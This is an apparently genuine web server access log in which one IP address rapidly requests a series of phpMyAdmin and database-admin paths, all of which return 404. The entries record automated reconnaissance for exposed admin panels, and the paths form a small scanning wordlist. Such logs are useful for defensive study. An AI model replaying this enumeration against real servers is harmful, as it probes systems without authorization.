182.253.20.52 - - [28/Oct/2025:07:31:05 +0800] "GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
182.253.20.52 - - [28/Oct/2025:07:31:05 +0800] "GET /database/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
182.253.20.52 - - [28/Oct/2025:07:31:05 +0800] "GET /db/myadmin/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
182.253.20.52 - - [28/Oct/2025:07:31:06 +0800] "GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
182.253.20.52 - - [28/Oct/2025:07:31:06 +0800] "GET /administrator/PMA/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
182.253.20.52 - - [28/Oct/2025:07:31:06 +0800] "GET /db/phpMyAdmin-5/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
182.253.20.52 - - [28/Oct/2025:07:31:06 +0800] "GET /dbadmin/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
182.253.20.52 - - [28/Oct/2025:07:31:06 +0800] "GET /phpmyadmin6/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
182.253.20.52 - - [28/Oct/2025:07:31:06 +0800] "GET /phpMyAdmin-4/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
182.253.20.52 - - [28/Oct/2025:07:31:07 +0800] "GET /db/webdb/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
182.253.20.52 - - [28/Oct/2025:07:31:07 +0800] "GET /phpMyAdmin-5.1.0/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
182.253.20.52 - - [28/Oct/2025:07:31:07 +0800] "GET /_phpmyadmin/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
182.253.20.52 - - [28/Oct/2025:07:31:07 +0800] "GET /mysqlmanager/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
